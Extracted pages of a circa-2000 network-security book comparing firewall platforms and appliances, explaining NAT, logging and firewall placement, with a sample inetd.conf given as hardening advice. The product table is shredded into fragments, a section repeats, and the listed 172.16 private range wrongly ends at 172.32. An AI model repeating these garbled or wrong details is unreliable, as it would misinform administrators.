\nis an application that runs on top of an operating system. An example is Check Point’s Firewall-1, which runs on \nWindows NT and 2000. An appliance-based firewall, or integrated solution, is a firewall application that runs on \nproprietary hardware and software. For example, the Cisco PIX firewall is an example of an integrated device in \nwhich the entire system is not capable of being anything other than a firewall, and does not include a hard drive or \nother traditional components of a server. Because of its integrated and proprietary nature, these boxes are \ntraditionally faster, more robust, and considered more secure than server-based firewalls. Server-based firewalls, \non the other hand, often provide additional configuration and support options, and can be cheaper than the \nintegrated solutions. \nServer-Based Firewalls \nServer-based firewalls are applications that run on top of an operating system. Firewalls exist for the following \nplatforms: \nƒ \nMacintosh \nƒ \nUnix \nƒ \nLinux \n" }, { "page_number": 104, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 104\nƒ \nMicrosoft Windows NT \nƒ \nMicrosoft Windows 2000 \nMacintosh \nAs unlikely a choice as this might seem to most system administrators, there are firewall products designed for the \nMacintosh operating system. And although some system administrators might scoff at the idea, there are \nimpressive examples of secure Mac-based Internet systems—including the United States Army, which has been \nhosting its Web site on a WebSTAR server running the Macintosh OS since the early part of 1999, and that server \nhasn’t been successfully hacked since. \nHowever, the Macintosh operating system is undergoing a radical change, which will culminate in 2001 with the \nrelease of the consumer version of OS X (10). OS X is based on the NeXTStep operating system, which itself is \nbased on the Mach kernel and BSD (Berkeley Software Distribution of UNIX). Even though Apple has released \nthe source code of OS X, it has made significant changes to the kernel to adapt it to the Macintosh platform. It has \nyet to be seen how these changes (along with Apple-specific implementations of DNS and HTTP) will affect the \nsecurity as whole. \nMacintosh Strengths So what distinguishes the Macintosh as an operating system from other notable server \nOSs? There is a widespread belief that running a firewall on a Mac will be inherently more secure simply because \nmost hackers are unfamiliar with Mac technology. And while there are some reported vulnerabilities in \napplications that run on the Mac, very few reports exists about weaknesses of the operating system itself. \nThere is also the ease of configuration. Because the Macintosh is GUI-only and offers few network services \n(beyond basic file and print), complexity (the bane of any security system) is greatly reduced. \nFinally, a firewall running on the new OS X will see benefits of performance (from a cutting-edge UNIX-based \noperating system), configuration (each specific service can be turned on or off at will), and support tools (most \nUNIX-based security support utilities will run on OS X). \nMacintosh Weaknesses There are some significant weaknesses that are actually the flip side of the Macintosh’s \nstrengths. Because the system is not well known, the possibility exists that many vulnerabilities are waiting to be \ndiscovered by any hacker who might make a serious attempt to penetrate it. \nAlso, because a Macintosh server has only a limited number of configuration and application choices, \nadministrators may feel that they miss extras—like the ability to highly customize the components on their server. \nAnd although there are firewall products for the Macintosh, most of these are designed to be personal firewalls, \nnot to function as servers to protect an entire network. This, coupled with the lack of many supportive tools for \nfirewalls (such as Macintosh-based analysis and response tools), significantly limits the flexibility of a Macintosh-\nbased firewall. \nThere is also the issue of performance. Although in recent years Apple hardware has seen very impressive \nperformance, the operating system has not followed suit. As a result, a very busy Macintosh server acting as a \nfirewall and router can potentially become overwhelmed. \nFurthermore, OS X will introduce some new weaknesses. Because of its UNIX heritage, the greatest initial \nsecurity risks on OS X come from the daemons (services) that are installed by default—something that we’ll cover \nmore in depth in talking about UNIX (below). \nUNIX \nUNIX has been around far longer than other operating systems, including Microsoft Windows NT (and NT-based \noperating systems like Windows 2000), and the first firewalls were designed on Unix systems. This means that the \nidiosyncrasies of the platform are well understood and documented, and the firewall products that run on it are \nstable. Although most versions of Unix are sold commercially (such as Sun’s Solaris, HP’s HP-UX, and IBM’s \nAIX), it is still considered a fairly open system because so much is known about its fundamental structure and \nservices. When security weaknesses are discovered with Unix, they tend not to be with the core operating system, \nbut with services and applications running on top of it. \nUnix also has the benefit of outperforming other operating systems. This, combined with the many hardware \nplatforms and configurations that support Unix, makes it a preferred operating system for intensive and large data \noperations. Good firewall practice dictates that all applications and components not essential to the operation of \nthe firewall are disabled, and this is particularly easy to accomplish in UNIX. \n" }, { "page_number": 105, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 105\nUNIX Strengths Specific strengths of UNIX are many. It is highly configurable, well understood by many in the \nsecurity industry, and is the most prominent operating system in existence. Many resources are dedicated to \nunderstanding and fixing any security issues that might arise. \nUNIX is also considered to be a very stable high-performing operating system. In addition because of its ability to \nrun on multiple hardware platforms (such as the DEC Alpha and the IBM RS/6000), and on multiple-processor \nversions of these platforms, it can support high data rates required of any firewall supporting a large network. It is \nalso relatively immune from the need to reboot the machine after configuration changes, something that has \nafflicted Windows NT-based systems. \nThere are more security and security support products for UNIX than for any other platform (although Windows \nNT is a close second). This, coupled with its 30-year history, has made UNIX the preferred choice for many large \norganizations. \nUNIX Weaknesses So what are the negatives? Problems arise when inexperienced Unix administrators place \nfirewalls on “out of the box” installations and don’t disable the many vulnerable (but potentially valuable on a \nnon-firewall system) programs and services (daemons) that are enabled by default. And because many of these \ndaemons are configured to run in the security context of the root (the all-powerful superuser account) they provide \nan attacker with complete access to the system once they have exploited vulnerable system components. \nDeactivating daemons is relatively simple. Administrators simply remove or rename the scripts that activate the \nrespective daemon at boot time, or comment out the line in the inetd.conf configuration file, if the daemon is \ncalled by inetd. (See the following view of an inetd.conf configuration file.) \n# These are standard services. \n# \nftp stream tcp nowait root /usr/sbin/tcpd in.ftpd -l -a \ntelnet stream tcp nowait root /usr/sbin/tcpd in.telnetd \ngopher stream tcp nowait root /usr/sbin/tcpd gn \n#smtp stream tcp nowait root /usr/bin/smtpd smtpd \n#nntp stream tcp nowait root /usr/sbin/tcpd in.nntpd \n# \n# Shell, login, exec and talk are BSD protocols. \n# \nshell stream tcp nowait root /usr/sbin/tcpd in.rshd \nlogin stream tcp nowait root /usr/sbin/tcpd in.rlogind \n#exec stream tcp nowait root /usr/sbin/tcpd in.rexecd \ntalk dgram udp wait root /usr/sbin/tcpd in.talkd \nntalk dgram udp wait root /usr/sbin/tcpd in.ntalkd \n#dtalk stream tcp waut nobody /usr/sbin/tcpd in.dtalkd \n# \n# Pop and imap mail services et al \n# \npop-2 stream tcp nowait root /usr/sbin/tcpd ipop2d \npop-3 stream tcp nowait root /usr/sbin/tcpd ipop3d \nimap stream tcp nowait root /usr/sbin/tcpd imapd \n# \n# Tftp service is provided primarily for booting. Most sites \n# run this only on machines acting as \"boot servers.\" Do not uncomment \n# this unless you *need* it. \n# \n#tftp dgram udp wait root /usr/sbin/tcpd in.tftpd \n#bootps dgram udp wait root /usr/sbin/tcpd bootpd \n" }, { "page_number": 106, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 106\n# \n# Finger, systat and netstat give out user information which may be \n# valuable to potential \"system crackers.\" Many sites choose to disable \n# some or all of these services to improve security. \n# \n# cfinger is for GNU finger, which is currently not in use in RHS Linux \n# \nfinger stream tcp nowait root /usr/sbin/tcpd in.fingerd \n#cfinger stream tcp nowait root /usr/sbin/tcpd in.cfingerd \n#systat stream tcp nowait guest /usr/sbin/tcpd /bin/ps -auwwx \n#netstat stream tcp nowait guest /usr/sbin/tcpd /bin/netstat -f \ninet \n# \n# Time service is used for clock synchronization. \n# \ntime stream tcp nowait nobody /usr/sbin/tcpd in.timed \ntime dgram udp wait nobody /usr/sbin/tcpd in.timed \n# \n# Authentication \n# \nauth stream tcp nowait nobody /usr/sbin/in.identd in.identd \n-l -e -o \n# \n# End of inetd.conf \nMore weaknesses are exploited in Unix on a weekly basis than on any other operating system. As an example, \nCERT (the Computer Emergency Response Team at Carnegie Mellon) reported on September 15, 2000 that \nhackers were using two common vulnerabilities to conduct widespread attacks. The first vulnerability is with the \nrpc.statd daemon that is used to support NFS (Network File System). The second is with wu-ftpd, an ftp server \npackage provided by Washington University. Because these services are installed and activated on most UNIX \n(and Linux) systems by default, administrators who install firewalls on default installations are leaving their entire \nnetwork vulnerable. \nUnix is considered to be a more difficult system to learn and administer, and the cost of a Unix system has \ntraditionally been more expensive than other operating systems. And because there are so many documented \nweaknesses with Unix, an administrator has to invest more time in securing the system; otherwise an attacker with \naccess to the same information on Unix vulnerabilities can take advantage of “so many holes.” \nOpenBSD: An exception to the UNIX rule One UNIX variation that minimizes the risk of pre-installed \nvulnerable daemons is OpenBSD. OpenBSD installs with no accessibility; the administrator is forced to manually \nchoose which services and components will run. \nCreated and maintained by volunteers and distributed for free, OpenBSD is sometimes confused with Linux. In \nfact, it is a very tightly controlled collaborative UNIX project with specific goals. While weaknesses can still be \nfound, the response time to correct those weaknesses is considered the best in the industry. That, coupled with a \nproactive attitude toward locating and correcting software errors, makes OpenBSD a compelling choice for many \nfirewall administrators. \nLinux \nWhat about Linux, the most significant challenger in the operating system wars in recent memory? Linux shares \nmany of the strengths and weaknesses of UNIX. \nLinux Strengths Like Unix, the Linux platform is highly configurable, stable, well-understood, and has many \navailable security related products. The greatest attraction to Linux, however, is its open nature. In fact, Linux is \nmore open than OpenBSD, and many in the security industry favor this principle of exposing source code to as \n" }, { "page_number": 107, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 107\nmany eyes as possible in the search for errors and vulnerabilities. And the communal nature of the Linux \ncommunity means a ready and willing support group for security specialists with concerns and questions. \nLinux Weaknesses The factors that weigh against Linux are that it’s difficult to learn and has many known \nvulnerabilities. \nMicrosoft Windows NT \nIn contrast to Linux, Microsoft brings the power of familiarity. As Cervantes observed in Don Quixote, however, \nfamiliarity breeds contempt, and that’s true of Microsoft Windows NT and Windows 2000. \nNT Strengths Since Windows NT is an extension of the Windows Desktop environment (by far the most popular \noperating system ever produced), NT is a far more familiar environment to the typical end user. This means that \nthe user is not forced to learn a completely new environment just to run firewall software. Even more important, a \ncompany is not required to hire additional resources just to manage its firewall. \nIn fact, NT-based systems have traditionally been less expensive than their UNIX counterparts, and the fact that \nthe investment in hardware and software (let alone expertise) is usually less for an NT-based system must be taken \ninto account. \nIt is argued that familiarity augments security. Since people are familiar with NT, they are less likely to configure \nthe platform incorrectly and cause a security problem. While it may or may not be true that UNIX can be \nconfigured to be a more secure environment, certainly a secure environment can never be achieved if a user does \nnot understand how to properly manage it. \nFinally, the argument can be made for consistency. Since many organizations run NT for file, print, and \napplication services, it makes sense to standardize on this one platform for all required services. This makes \nadministration easier and more harmonious. It also helps to reduce or abolish compatibility problems. \nNT Weaknesses The greatest weakness attributed to NT is one of perception—that Microsoft is slow and \nreluctant to admit and correct security weaknesses. While there has been an incident where a third party has \ndiscovered a weakness, privately notified Microsoft, and then notified the public because they waited for over a \nmonth for Microsoft to announce a patch, there is no evidence that this is a pattern. And while significant \nvulnerabilities have been discovered, they have, for the most part, been limited to services that are not pre-\ninstalled on NT and would not be placed on a firewall system (like IIS—Microsoft’s Web server). \nBecause of the proprietary nature of NT, not much is known about the internal workings of the services, and they \nare not configurable to the same degree as UNIX daemons. This might also provide some uncertainty for security \nspecialists who are looking for the most secure platform with which to run their firewall. \nOther negatives include the need to reboot NT servers after configuration changes (or even after several days or \nweeks of operation due to system instability), and purchase and licensing fees associated with an NT server. \nWindows 2000 \nHow does Windows 2000 compare to Windows NT? Windows 2000 shares many common weaknesses with \nWindows NT, including its proprietary nature, the perceived reluctance on the part of Microsoft to admit (and \nremedy) vulnerabilities, and the significant costs associated with using a Windows product. Like NT, Windows \n2000 also has the strength of user familiarity and consistency throughout the network. \nWindows 2000 does have some unique strengths that distinguish it from NT. First is the ability to make \nconfiguration changes without needing to restart the server. Second is the increased stability of the server, which \nlengthens its uptime (and therefore, increases reliability). \nMany experts believe that it is too early to determine how secure W2K is compared to NT, and that more time is \nnecessary to expose potential errors and vulnerabilities. Some weaknesses unique to W2K have already been \ndiscovered and patched—such as the vulnerability in the Telnet Service that would allow a hacker to take full \ncontrol of an administrative telnet session, leaving the entire server (and potentially the entire network) exposed \nand at risk. \nAppliance-Based Firewalls \nAlso called integrated solutions, appliance-based firewalls run on proprietary hardware and software, and usually \nconsist of a physically small box with network connections and a power source. Appliance-based firewalls include \nƒ \nCisco Pix \nƒ \nCheck Point VPN-1 \n" }, { "page_number": 108, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 108\nƒ \neSoft Interceptor \nƒ \nProgressive Systems Phoenix Adaptive Firewall \nƒ \nSonicWALL PRO \nƒ \nWatchGuard LiveSecurity System 4.1 \nIntegrated firewalls provide an all-in-one solution, with the vendor supplying the hardware, software, and \noperating system. Integrated solutions are quite popular, especially for small businesses that do not have a full-\ntime IT staff and require basic firewall functionality without the need for advanced customization. Larger \nbusinesses also rely on more expensive, higher-end integrated firewalls to handle the extreme traffic flow \ngenerated by having many computers that require protected access to the Internet, or e-commerce sites that have \nmillions of visitors a day. \nAppliance Strengths \nThe greatest benefit of integrated solutions is their short configuration time. Many firewalls are pre-configured to \nprotect your network literally out of the box. Simply by connecting the Internet into one port, and your internal \nnetwork into another, the device begins to immediately filter network traffic. Small businesses benefit from this \nsimplicity, especially when they do not have a full-time or experienced IT staff. If configuration is required, \nadministration can be done from a simple Web browser or from the installation of a proprietary administrative \nutility. \nPerformance is the other benefit most often cited by large corporations who purchase integrated firewalls. Because \nthese firewalls use programmable hardware (also called firmware), they can operate at much higher speeds than \nthose firewalls that have an extra layer of operating system and hardware, (both of which are designed to do \ngeneral computing tasks, and have not been optimized for firewall tasks). \nThis focus on dedicated design also has the potential of reducing firewall costs, since there is no requirement to \npurchase an operating system and licenses in addition to the firewall application; everything is included in a tightly \nintegrated package by the vendor. This monolithic approach (where everything is controlled, designed, and \nsupported by vendor) can actually increase security by minimizing the number of hands in the pie. And simplicity \n(having one vendor produce everything) is considered the Holy Grail of any security system. \nAppliance Weaknesses \nOn the other hand, such a monolithic approach to a firewall might limit the flexibility of a product or the ability to \nupgrade the underlying hardware (such as installing more RAM as desired in a server-based firewall). Appliances \nalso limit an organization to one vendor for their entire security system, as opposed to using a modular system that \ncould encourage “best of breed” for all components—the best operating system tied to the best firewall which \nfeeds into the best analysis system, with all three coming from different vendors. \nAppliances have also been known to be more expensive than simple software solutions, and depending on the \nlevel of complexity needed by your organization, you might be better served by going with a traditional software \nfirewall. \n \nAdditional Firewall Considerations \nNo matter what type of firewall you choose, there are some potential features that you should analyze closely \nbefore selecting a specific firewall product. These features are common to all types of firewalls, so we will review \nthem here in a two-part summary. \nƒ Firewall Functionality \no Address translation \no Firewall logging and analysis \no VPNs \nƒ Management \no Intrusion Detection and Response \no Integration and deployment \no Authentication/Access Control/LDAP \no Third-party tools \n" }, { "page_number": 109, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 109\nWe will examine each of these features and the issues you need to consider when choosing a firewall product. \nAddress Translation \nAddress translation is considered a basic firewall function. Don’t trust a firewall product that doesn’t include this \noption. When an IP address is converted from one value to another, it is called address translation. This feature \nhas been implemented in most firewall products and is typically used when you do not wish to let remote systems \nknow the true IP address of your internal systems. Figure 5.12 shows the typical deployment of this configuration. \n \nFigure 5.12: Address translation \nOur internal workstation wishes to access an external Web site. It formulates a request and delivers the \ninformation to its default gateway, which in this case is the firewall. The desktop system has one minor problem, \nthough: the subnet on which it is located is using private addressing. \nPrivate addressing is the use of IP subnet ranges that can be used by any organization when addressing its internal \nhosts. This is allowable because these ranges are not permitted to be routed on the Internet. While this means we \ncan use these addresses without fear of conflict, it also means that any request we send out to a remote system will \nnot know which route to take in order to reply. These ranges are \nƒ \n10.0.0.0–10.255.255.255 \nƒ \n172.16.0.0–172.32.255.255 \nƒ \n192.168.0.0–192.168.255.255 \nIt’s All in the Port Numbers \nHow does the firewall distinguish between replies that are coming back to this workstation and traffic that is \ndestined for other systems or for the firewall itself? If the firewall is translating the address of all desktop \nmachines to match the address of its own interface, how does it tell the difference between different sessions? \nLook closely at the two packet headers in Figure 5.12 and you will see that one other value has been changed. \nAlong with the source IP address, the firewall has also changed the source port number. This port number is used \nto identify which replies go to which system. \nRemember that the source port is typically a value dynamically assigned by the transmitting system. This means \nthat any value above 1023 is considered acceptable. There should be no problems with having the firewall change \nthis value for accounting purposes. In the same way that the source port number can be used between systems to \ndistinguish between multiple communication sessions, the firewall can use this source port number to keep track \nof which replies need to be returned to each of our internal systems. \nOur firewall will modify the IP header information on the way out and transmit the packet to its final destination. \nOn the way back, our firewall will again need to modify the IP header in order to forward the data to the internal \nsystem. In the reply packet, it will be the destination IP address and service port that will need to be changed. This \nis because the remote server will have replied to the IP address and source port specified by the firewall. The \nfirewall needs to replace these values with the ones used by the desktop workstation before passing along the \ninformation. \n" }, { "page_number": 110, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 110\n \nSo while our workstation could reach the remote server, the remote server would not be able to reply. This is \nwhere address translation is useful: we can map the IP address of the workstation to some other legal IP address. \nIn the case of Figure 5.12, we have translated the desktop’s IP address of 192.168.1.50 to the same legal address \nused by the external interface of the firewall, which is 199.53.72.2. \nThere are three ways of deploying address translation: \nƒ \nHiding Network Address Translation (hiding NAT) \nƒ \nStatic Network Address Translation (static NAT) \nƒ \nPort Address Translation (PAT) \nThe benefits and limitations of each are reviewed in the following sections. \nHiding NAT \nHiding NAT functions exactly as described in Figure 5.12. All internal IP hosts are hidden behind a single IP \naddress. This can be the IP address of the firewall itself or some other legal number. While hiding NAT can \ntheoretically support thousands of concurrent sessions, multiple hiding addresses can be used if you require \nadditional support. \nThe biggest limitation of hiding NAT is that it does not allow the creation of any inbound sessions. Since all \nsystems are hidden behind a single address, the firewall has no way of determining which internal system the \nremote session request is destined for. Since there is no mapping to an internal host, all inbound session requests \nare dropped. \nThis limitation can actually be considered a feature, as it can help augment your security policy. If your policy \nstates that internal users are not allowed to run their own servers from their internal desktop machines (Web, FTP, \nand so on), using hiding NAT for all desktop machines is a quick way to insure that these services cannot be \ndirectly accessed from outside the firewall. \nStatic NAT \nStatic NAT functions similarly to hiding NAT, except that only a single private IP address is mapped to each \npublic IP address used. This is useful if you have an internal system using private IP addresses, but you wish to \nmake this system accessible from the Internet. Since only one internal host is associated with each legal IP \naddress, the firewall has no problem determining where to forward traffic. \nFor example, let’s assume that you have an internal Exchange server and you wish to enable SMTP functionality \nso that you can exchange mail over the Internet. The Exchange server has an IP address of 172.25.23.13, which is \nconsidered private address space. For this reason, the host cannot communicate with hosts located on the Internet. \nYou now have two choices: \nƒ \nYou can change the address from a private number to a legal number for the entire \nsubnet on which the Exchange server is located. \nƒ \nYou can perform static NAT at the firewall. \nClearly, the second option is far easier to deploy. It would allow internal systems to continue communicating with \nthe Exchange server using its assigned private address, while translating all Internet-based communications to a \nvirtual legal IP address. \nStatic NAT is also useful for services that will break if hiding NAT is used. For example, some communications \nbetween DNS servers require that the source and destination port both be set to port 53. If you use hiding NAT, \nthe firewall would be required to change the source port to some random upper port number, thus breaking the \ncommunication session. By using static NAT, the port number does not need to be changed, and the \ncommunication sessions can be carried out normally. \nTip \nMost NAT devices will allow you to use both static and hiding NAT simultaneously. This \nallows you to use static NAT on the systems that need it, while hiding the rest. \n" }, { "page_number": 111, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 111\nPort Address Translation (PAT) \nPort address translation is utilized by most proxy firewall products. When PAT is used, all outbound traffic is \ntranslated to the external IP address used by the firewall, in a way similar to hiding NAT. Unlike hiding NAT, the \nexternal address of the firewall must be used. This cannot be set to some other legal value. \nThe method for dealing with inbound traffic varies from product to product. In some implementations, ports are \nmapped to specific systems. For example, all SMTP traffic directed at the firewall’s external interface (which has \na destination port number of 25) is automatically forwarded to a specific internal system. For a small environment, \nthis limitation is rarely a problem. For large environments that operate multiple systems running the same type of \nserver (such as multiple mail or FTP servers), this deficiency can be a major obstacle. \nIn order to get around this problem, some proxy servers can analyze data content in order to support multiple \ninternal services. For example, a proxy may be able to forward all inbound SMTP mail addressed as \nuser@eng.bofh.org to one internal mail system and mail addressed to user@hr.bofh.org to another. \nIf you have multiple internal servers running the same service, make sure your firewall can distinguish between \nthem. I’ve seen more than one organization that has been bitten by this limitation and has been forced to place \nservers outside the firewall. This is like walking to work in a blizzard because the shiny new Corvette you just \npurchased got stuck in a half-inch of snow. \nFirewall Logging and Analysis \nWhile a firewall’s primary function is to control traffic across a network perimeter, a close second is its ability to \ndocument and analyze all the traffic it encounters. Logging is important because it documents who has been \ncrossing your network perimeter—and who has attempted to cross, but failed. Analysis is important because it \nmight not be readily apparent from a casual view of the log which incidents are attempts to actually cross your \nperimeter, and which are investigations for openings in the “fence” in preparation for a future attack. \nWhat defines a good firewall log? Obviously, this comes down to personal preference. There are, however, a \nnumber of features you should consider: \nƒ \nThe log should present all entries in a clear, easy-to-read format. \nƒ \nYou should be able to view all entries in a single log so that you can better identify traffic \npatterns, although the ability to export the log data to an analysis tool would be of even \ngreater value. \nƒ \nThe log should clearly identify which traffic was blocked and which traffic was allowed to \npass. \nƒ \nIdeally, you should be able to manipulate the log, using filtering and sorting, to focus on \nspecific types of traffic, although this feature is best suited to an analysis tool. \nƒ \nThe log should not overwrite itself or drop entries based upon a specific size limitation. \nƒ \nYou should be able to securely view logs from a remote location. \nƒ \nThe logging software should have some method of exporting the log to at least one common \nformat, such as ASCII text (preferably with some kind of delimiter). This allows the data to \nbe manipulated further within a reporting tool, spreadsheet, or database program. \nKind of a tall order, but all are important features. It is very rare that an attacker will gain access on the very first \ntry. If you schedule time to scrutinize the logs on a regular basis, you may be able to thwart an attack before it \neven happens. A good logging tool will help. \nFor example, look at the log viewer shown in Figure 5.13. This is FireWall-1’s log viewer, and it does a very good \njob of fulfilling the criteria we have listed. The log is easy to read, easy to follow, and can even be reviewed \nremotely from an alternate workstation through a secure session. The Select menu option even lets you select \ndifferent filtering and sort options. \n" }, { "page_number": 112, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 112\n \nFigure 5.13: Firewall-1’s log viewer \nLook closely at the services reported in each of the packet entries in Figure 5.13. See anything strange? Our source \nsystem Herne appears to be attempting to connect to Skylar on every TCP service port sequentially. Our display \nstarts at service port 20 (FTP-data) and continues one port at a time to port 35. This is an indication that Herne is \nrunning a port scanner against Skylar in order to see what services are offered. \nIn contrast to this would be a log viewer such as the one used with Secure Computing’s BorderWare firewall. This \nfirewall maintains no less than six separate logs. While this makes tracking a particular service a bit easier, it \nmakes tracking a specific host far more difficult. You would need to use a third-party program in order to combine \nthe information and get a clear look at what is going on. Also, while the log in Figure 5.13 can be exported and \nsaved using a simple menu option, BorderWare requires you to enable FTP administration and manually transfer \nthe file to your local machine. \nTip \nKeep the flexibility of the log interface in mind when you are selecting a firewall product. \nWhile the firewall’s ACL will typically be set and require very few changes, you should \nplan on spending quite a bit of time reviewing your firewall logs and analyzing traffic flow. \nVirtual Private Networks (VPNs) \nVirtual private networks (VPNs) are considered a feature that sets a high-end firewall apart from the rest of the \ncrowd. VPNs allow authenticated and encrypted access to an intranet through the public Internet. This means that \ninstead of expensive point-to-point communication, LANs or mobile users can use inexpensive ISPs to \ncommunicate with their internal organization’s resources. \nHowever, simply providing basic VPN service is not enough. You’ll need to determine what configuration, \nmanagement, and encryption options your firewall provides for VPNs. In some cases a dedicated VPN solution \nthat integrates into your firewall might provide the best results. \nIntrusion Detection and Response \nThe ability of a firewall to notify an administrator while an attack is taking place should also enter the purchase \nand deployment decision. In the case of the high-profile DoS (Denial of Service) attacks that took place in \nFebruary of 2000, the ability of the firewall systems to instantly notify the IT staff of unusual network activity \nallowed several of the sites to return to functionality within the hour. \nFuture firewall systems promise a degree of cooperation that would allow entire networks to respond to and \nreconfigure themselves in the event of an attack. While experts feel that the technology for this level of proactive \nmonitoring and response is feasible, challenges remain. To be truly effective, such a system would require the \ncooperation and communication of all affected parties, even if this involved distinct (or even competitive) \nbusinesses and organizations. Assuming such a level of communication and integration existed, the anonymity of \nan attacker would become much more difficult to maintain, and the effects of an attack would be neutralized much \nmore quickly. \nThere are already formal and informal groups that monitor and report intrusions, as well as virus, worms, and \nTrojan horse infections (such as the “I Love You” worm in May of 2000). However, the reporting mechanisms \nare, more often than not, manual, requiring an “eyes on” approach. Ideally, reporting would be automatic, \nstandardized, and provide intelligent systems with enough information to allow for automatic or proactive \ndefensive actions. \n" }, { "page_number": 113, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 113\nIntegration and Access Control \nFirewalls are integrating more and more with other network systems and services. This trend promises to simplify \nadministration, reduce complexity, and increase TCO (Total Cost of Ownership), as firewalls no longer have to \nduplicate pre-existing network infrastructure. \nExamples of integration include directory and authentication services that eliminate redundant user account \ninformation and allow customizable authentication schemes. Two industry standards that provide these services \nare LDAP (Lightweight Directory Access Protocol) and RADIUS (Remote Authentication Dial In User Service). \nLightweight Directory Access Protocol (LDAP) \nLDAP creates a tunnel between two directory services, or between a directory service and a client. For firewalls, \nthis means that instead of creating user and group/ role accounts redundantly, the system can use accounts and \nproperties stored in a third-party directory service to determine access. This has a direct benefit of reducing the \nadministrative burden of creating and managing duplicate user and group/ role accounts, and it also reduces \ncomplexity—the greatest enemy to any security system. Examples of directory services include Microsoft’s AD \n(Active Directory), Novell’s NDS (Netware Directory Services), iPlanet’s Directory Server. \nRemote Authentication Dial In User Service (RADIUS) \nRADIUS offers an extensible and independent platform for authentication. Not only does this allow for customized \nauthentication schemes (such as smart cards or biometric devices), RADIUS servers offload the actual \nauthentication workload from the firewall (or LDAP-compliant directory services). By providing an infrastructure \ndedicated only to authentication, RADIUS simplifies and strengthens the authentication (and as a result, access) \nprocess. \nThird-Party Tools \nMany modern networks are a Frankenstein of multiple technologies from many different vendors; while this may \nbe an optimal collection of technology for your organization, it can be a nightmare to administer. Fortunately, new \ntechnologies are emerging that are designed to centrally monitor and manage all of your network devices and \napplications. An excellent example is HP’s OpenView which provides management in the following areas: \nƒ \nApplications \nƒ \nAvailability \nƒ \nNetworks \nƒ \nPerformance \nƒ \nServices \nƒ \nSystems \nƒ \nStorage and Data \nThe ability for your firewall to work with third-party management tools could easily be a decisive factor in which \nproduct you choose. \nBut management is not the only area for which you can find third-party products. Check Point’s VPN-1 allows \nother vendors to extend their features to include URL filtering, antivirus scanning, and e-mail spamming \nprotection. These additional benefits might justify the (usually) increased cost of such a product. \nYou Decide \nThere are some strong arguments for each choice. In order to make the proper selection for your environment, you \nwill need to review all of these arguments and decide which are more applicable to your particular environment. \nTable 5.6 breaks down popular firewall products by price, feature, and platform. \n \n \n \n \n \n \n" }, { "page_number": 114, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 114\nTable 5.6: Popular firewall products compared by price, feature, and platform \nNa\nme \nSer\nvice\ns \n(Sta\nti /\nOpe\nratin\ng \nSyst\nAdd\nress \ntran\ns\nFire\nwall \nlogg\ning \nVP\nNs \nIntr\nusio\nn \nDet\nInte\ngrati\non \nand \nacc\nOth\ner \nserv\nices \n(incl\nChe\nck \nPoi\nnt\nAll \nApp\nlian\nce \nYes \nMon\nitori\nng \nacti\nYes \n(incl\nudin\ng \nCan \nbe \ncent\nrally\nDE\nS \nand \n3DE\nS\nUR\nL \nfilter\ning, \nanti\nCisc\no \nSec\nure\nAll \nApp\nlian\nce \nYes \nAdd\n-on \n(Cis\nco \nIPS\nec, \nPPT\nP \nCisc\no \nSec\nure\nRA\nDIU\nS, \nTA\nCA\nAnti\nviru\ns, \nUR\nL \neSo\nft \nInte\nrcep\nAll \nBS\nD \nUni\nx\nYes \nNo \nnati\nve \nsup\nICP\nSec \n(opti\nonal\nPag\ner, \ne-\nmail\nCry\npto\nCar\nd, \nRA\nLea\nrnin\ng \nCo\nmpa\nPro\ngres\nsive \nSyst\nAll \nApp\nlian\nce \nYes \nExp\nort \nof \ndata \nPro\npriet\nary \n(IPS\nRea\nctiv\ne \nanti\nEntr\nust, \nRA\nDIU\nS\nNon\ne \nSon\nicW\nALL \nPR\nAll \nApp\nlian\nce \nYes \nLimi\nted, \nno \nanal\nIPS\nec, \nPPT\nP\nEm\nail \n56-\nbit \nDE\nS, \n3DE\nAut\noUp\ndate\n, \ncoo\nWat\nchG\nuar\nd\nAll \nApp\nlian\nce \n(Lin\nYes \nRea\nl \ntime \nlogg\nPPT\nP \nEm\nail, \npag\ner\nRCr\nypto\nCar\nd, \nInte\nNet\nMee\nting \n(har\ndwa\n \n \n \n \n \n \n \n \n \n \n" }, { "page_number": 115, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 115\n \nFirewall Deployment \nYou have selected a firewall product—now the big question is how it should be placed within \nyour network environment. While there are many different opinions on this topic, the most \ncommon deployment is shown in Figure 5.14. \n \nFigure 5.14: Where to place your firewall \nIn this design, all internal systems are protected by the firewall from Internet-based attacks. \nEven remote sites connected to the organization via the WAN link are protected. All systems \nthat are accessible from the Internet (such as the Web server and the mail relay) are isolated \non their own subnet. This subnet is referred to as a DMZ or demilitarized zone, because while \nit may be secure from attack, you cannot be 100 percent sure of its safety, as you are allowing \ninbound connections to these systems. \nUsing a DMZ provides additional protection from attack. Since some inbound services are \nopen to these hosts, an attacker may be able to gain high-level access to these systems. If \nthis occurs, it is less likely that additional internal systems will be compromised, since these \nmachines are isolated from the rest of the network. \nAdditional network cards can be added to the firewall in order to control other types of remote \naccess. For example, if the company has WAN links to business partners that are not officially \npart of the organization, another subnet could be created from an additional NIC card in the \nfirewall. All routers connecting to these remote business partners would then be located on \nthis subnet. The firewall would be able to control traffic between these sites and the internal \nnetwork. \nAdditionally, you can use the static packet filtering capability of your router to increase security \neven further. This provides a multilayered wall of protection at your network perimeter. If an \nexploit is found in one of your security devices, the second device may be able to patch the \nleak. \nThere are many variations of this basic design. For example, you could add an additional type \nof firewall to the configuration you saw in Figure 5.14 in order to enhance security even more. \nFor instance, if the firewall in the figure is a dynamic packet filter, you could place a proxy \nfirewall behind it in order to better secure your Internet connection. \nTip \nJust remember that it is always a good idea to place your firewall between the \nInternet and the assets you wish to protect, so that all communication sessions \nmust pass through the firewall. While this may sound like an extremely basic idea, \nyou might be surprised—if not shocked—at the way some organizations attempt to \ndeploy a firewall. \nFirewall Deployment \nYou have selected a firewall product—now the big question is how it should be placed within \nyour network environment. While there are many different opinions on this topic, the most \ncommon deployment is shown in Figure 5.14. \n" }, { "page_number": 